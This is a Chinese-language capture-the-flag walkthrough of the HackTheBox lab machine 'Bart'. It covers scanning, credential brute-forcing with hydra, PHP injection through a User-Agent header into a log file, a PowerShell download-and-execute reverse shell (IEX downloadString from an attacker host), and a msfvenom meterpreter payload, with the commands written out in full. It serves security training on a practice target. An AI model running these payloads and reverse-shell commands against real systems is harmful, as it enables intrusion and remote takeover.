首先还是打开靶机,使用nmap直接扫描,发现只打开了一个80端口。
nmap -sV -Pn -A 10.10.10.81
接着我们去访问下,发现会被跳转到forum.bart.htb
这种情况下,我们需要在hosts文件夹中添加一下相应的解析
vi /etc/hosts
#添加下面两行解析
10.10.10.81 forum.bart.htb bart.htb
接着用whatweb看下有没有合适的信息(这个地方可能的一个疑问是,为什么才开始不使用whatweb看看呢?因为才开始会跳转,出的信息不准确。)
whatweb -v 10.10.10.81
能发现的几个比较重要的信息是,有好多邮箱信息。同时还知道用的是wordpress,iis10等等。
ok,没看出来有什么东西,我们爆破一下目录试试。
使用gobuster爆破,发现一直报错,应该是因为跳转的问题
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb
接着使用wfuzz试试,注意排除一些没有用的响应,用–hh来排除。–hh的含义是通过返回的http字符过滤。
wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 150693 http://bart.htb/FUZZ
通过wfuzz,我们能知道有以下几个子目录。尝试访问后,发现这个monitor是个登录界面。
接着,我们能想起来,前面不是有邮箱嘛,我们试一下登录看看。(其实不是想起来,是看的别人博客,逃……)。我们可以对存在的用户名以及邮箱进行一下整理,可以得出如下表格
| 姓名 | 邮箱 |
|---|---|
| Daniel Simmons | d.simmons@bart.htb |
| Harvey Potter | h.potter@bart.htb |
| 无 | info@bart.htb |
| Robert Hilton | r.hilton@bart.htb |
| Samantha Brown | s.brown@bart.local |
其中的Harvey是最难找的,在页面中没有显示,需要找到源码。
既然这个Harvey最难找,那么我们先测试他,在monitor.bart.htb页面,有一个忘记密码选项,输入Harvey是显示发邮件了,那说明这个账号存在。注意,这个页面可能访问有点问题,记得在etc/hosts中添加相应的解析。
这里说一下第二种方法,信息收集过后爆破,有一个专门的工具cewl。以这一步的收集爆破为例,讲解一下
首先是用以下命令,收集页面信息,生成字典
cewl http://forum.bart.htb -w wordlist
接着去登录,使用bp进行爆破,也可以拿到用户名和密码
这就是第二种方法。
既然账号存在,我们用Harvey做用户名,potter做密码试试。直接进去了。在server中发现了另一个地址。继续添加这个地址到etc/hosts下面。
访问这个地址,好家伙,又是登录
直接再试试harvey以及potter,发现说密码必须长度大于等于8.
行吧,继续爆破试试,使用hydra
hydra -l harvey -P /etc/wordlist/rockyou.txt -t 60 internal-01.bart.htb http-form-post "/simple_chat/login.php:uname=^USER^&passwd=^PASS^&submit=Login: Password"
知道密码是Password1
成功登录进来了。
登录进来后,尝试点击屏幕上的按钮,当点击到Log按钮时,能发现会弹窗,我们循迹去找,能发现这个Log按钮点击了话,会记录下我们的浏览器信息
注意去源码中查找一下这个地方,找到了如下源码
注意去访问这个链接,发现记录下了名字和浏览器信息,既然如此,那么我们测试下修改浏览器信息呢?
修改浏览器信息,使用python进行如下请求
>>> import requests
>>> headers={'User-Agent':'pi1grim: <?php phpinfo(); ?>'}
>>> r = requests.get('http://internal-01.bart.htb/log/log.php?filename=phpinfo.php&username=harvey', headers=headers)
然后去请求这个页面,发现能够执行命令了。
http://internal-01.bart.htb/log/phpinfo.php
接着我们测试下命令
>>> headers={'User-Agent':"pi1grim: <?php system($_REQUEST['cmd']); ?>"}
>>> r = requests.get('http://internal-01.bart.htb/log/log.php?filename=pi1grim.php&username=harvey', headers=headers)
去访问下这个地址,添加上执行的命令
curl http://internal-01.bart.htb/log/pi1grim.php?cmd=whoami
确实可以了,那么我们就能够让其下载木马,回连接过来。
首先在Nishang主页中下载Invoke-PowerShellTcp.ps1文件,然后在最后添加一行
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.3 -Port 4444
保存好文件后,启动一个python3的http服务。同时nc监听本地4444端口。
随后,使用python进行如下请求
>>> import requests
>>> cmd = "powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.16.3:8083/Invoke-PowerShellTcp.ps1')"
>>> r = requests.get('http://internal-01.bart.htb/log/pi1grim.php?cmd={}'.format(cmd))
能够拿到远程的shell了。
当前的权限是不足的,我们使用winpeasany看能不能提权。
先准备好winpeasany.exe,自行谷歌下载即可。然后获取资源到靶机上。
准备好winpeas,使用python启动本地端口,然后让防火墙允许本地端口
python3 -m http.server 8083
ufw allow 8083
在靶机上执行
iwr -uri 'http://10.10.16.3:8083/winPEASany.exe' -outfile 'winpeas.exe'
执行winpeas.exe
./winpeas.exe
没搞定,因此我想着,还是得用msf上来,在前面获取到shell的情况下,我们用msf继续。
首先生成木马,然后上传,接着执行。
生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.16.3 lport=4444 -f exe > shell.exe
上传,在获取的shell中执行
iwr -uri 'http://10.10.16.3:8083/shell.exe' -outfile 'shell.exe'
然后本地msf监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.16.3
set lport 4444
run
拿到了meterpreter。既然有了meterpreter,那么直接提权就好了。
进入meterpreter的shell,然后找到root.txt以及user.txt
720
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
